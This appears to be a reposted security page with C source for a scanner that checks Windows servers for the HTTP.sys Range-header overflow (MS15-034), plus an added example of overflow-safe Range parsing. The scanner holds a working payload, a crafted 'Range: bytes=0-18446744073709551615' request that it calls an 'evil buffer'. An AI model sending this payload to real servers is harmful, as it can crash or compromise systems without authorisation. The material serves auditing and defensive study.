HTTP.sys Remote Code Execution Verification Tool

Source: Internet
Uploader: User


Vulnerability information:

A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys); it is triggered when HTTP.sys fails to parse a specially crafted HTTP request correctly. The test program here has been converted to a Windows (Winsock) build to make it easier to work with.

Code:

```c
/* UNTESTED - MS15-034 Checker

   THE BUG:

   8a8b2112 56              push    esi
   8a8b2113 6a00            push    0
   8a8b2115 2bc7            sub     eax,edi
   8a8b2117 6a01            push    1
   8a8b2119 1bca            sbb     ecx,edx
   8a8b211b 51              push    ecx
   8a8b211c 50              push    eax
   8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32.lib")

/* Open a TCP connection to ip:port. Returns INVALID_SOCKET on failure;
   a SOCKET is unsigned on Windows, so the original "< 0" checks never fired
   and the 0/1 error returns were indistinguishable from real descriptors. */
SOCKET connect_to_server(const char *ip, int port)
{
    SOCKET sockfd;
    struct sockaddr_in serv_addr;

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET) {
        printf("\n Error : Could not create socket %d\n", WSAGetLastError());
        return INVALID_SOCKET;
    }

    /* zero the struct (the original passed the character '0' here) */
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons((u_short)port);
    if (inet_pton(AF_INET, ip, &serv_addr.sin_addr) <= 0) {
        printf("\n inet_pton error occurred\n");
        closesocket(sockfd);
        return INVALID_SOCKET;
    }
    if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == SOCKET_ERROR) {
        printf("\n Error : Connect Failed \n");
        closesocket(sockfd);
        return INVALID_SOCKET;
    }
    return sockfd;
}

/* Send one request on a fresh connection and read the first chunk of the
   reply into buf, always NUL-terminated so strstr() is safe (the original
   searched an unterminated, possibly uninitialised buffer).
   Returns the number of bytes received, or -1 on any failure. */
static int exchange(const char *ip, int port, const char *req, char *buf, int buflen)
{
    SOCKET s = connect_to_server(ip, port);
    int n;

    if (s == INVALID_SOCKET)
        return -1;
    send(s, req, (int)strlen(req), 0);
    n = recv(s, buf, buflen - 1, 0);
    closesocket(s);
    if (n <= 0)
        return -1;
    buf[n] = '\0';
    return n;
}

int main(int argc, char *argv[])
{
    WSADATA wsadata;
    char recvBuff[1024];
    int port;
    // Check server
    char request[] = "GET / HTTP/1.0\r\n\r\n";
    // our evil buffer
    char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";

    if (argc != 3) {
        printf("\n Usage: %s <ip of server> <port of server> \n", argv[0]);
        return 1;
    }
    port = atoi(argv[2]);

    /* Winsock is initialised once per process, not once per connection */
    if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0) {
        printf("\n Error : WSAStartup failed\n");
        return 1;
    }

    printf("[*] Audit Started\n");
    if (exchange(argv[1], port, request, recvBuff, sizeof(recvBuff)) < 0) {
        WSACleanup();
        return 1;
    }
    if (!strstr(recvBuff, "Microsoft")) {
        printf("[*] NOT IIS\n");
        WSACleanup();
        return 1;
    }

    if (exchange(argv[1], port, request1, recvBuff, sizeof(recvBuff)) < 0) {
        WSACleanup();
        return 1;
    }
    if (strstr(recvBuff, "Requested Range Not Satisfiable")) {
        printf("[!!] Looks VULN\n");
        WSACleanup();
        return 1;
    } else if (strstr(recvBuff, "The request has an invalid header name")) {
        printf("[*] Looks Patched\n");
    } else {
        printf("[*] Unexpected response, cannot discern patch status\n");
    }
    WSACleanup();
    return 0;
}
```
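The disassembly in the comment above computes last - first with the sub/sbb pair and then adds 1 through RtlULongLongAdd, and a Range such as bytes=0-18446744073709551615 makes that addition wrap; the "; here" marks the call whose overflow status matters. As an added example (not the page's checker and not Microsoft's code), here is the validation a server-side parser should apply to that header, written in C; it handles only the single-range bytes=first-last form, which is an assumed simplification, and anything it rejects should be answered with 416 rather than used as a length.

```c
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for RtlULongLongAdd: returns 0 on unsigned 64-bit wrap
   (STATUS_INTEGER_OVERFLOW in the real routine) and 1 otherwise. */
static int ull_add(uint64_t a, uint64_t b, uint64_t *out)
{
    if (a > UINT64_MAX - b)
        return 0;
    *out = a + b;
    return 1;
}

/* Parse a single "bytes=first-last" range and return its byte count, or 0
   (never a legal length) when the header must be rejected with 416: both ends
   must be plain decimal numbers, first <= last, and last - first + 1 must
   fit in 64 bits. Assumed simplification: suffix and multi-range forms are not handled. */
uint64_t range_length(const char *header)
{
    const char *p;
    char *end;
    uint64_t first, last, len;

    if (strncmp(header, "bytes=", 6) != 0)
        return 0;
    p = header + 6;
    if (!isdigit((unsigned char)*p))          /* strtoull would accept a sign */
        return 0;
    errno = 0;
    first = strtoull(p, &end, 10);
    if (errno == ERANGE || *end != '-')
        return 0;
    p = end + 1;
    if (!isdigit((unsigned char)*p))
        return 0;
    errno = 0;
    last = strtoull(p, &end, 10);             /* ERANGE: value above 2^64 - 1 */
    if (errno == ERANGE || *end != '\0' || last < first)
        return 0;
    /* last - first is the sub/sbb pair in the disassembly; the +1 is the
       RtlULongLongAdd call whose status the vulnerable code did not check */
    if (!ull_add(last - first, 1, &len))
        return 0;
    return len;
}
```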

Test:
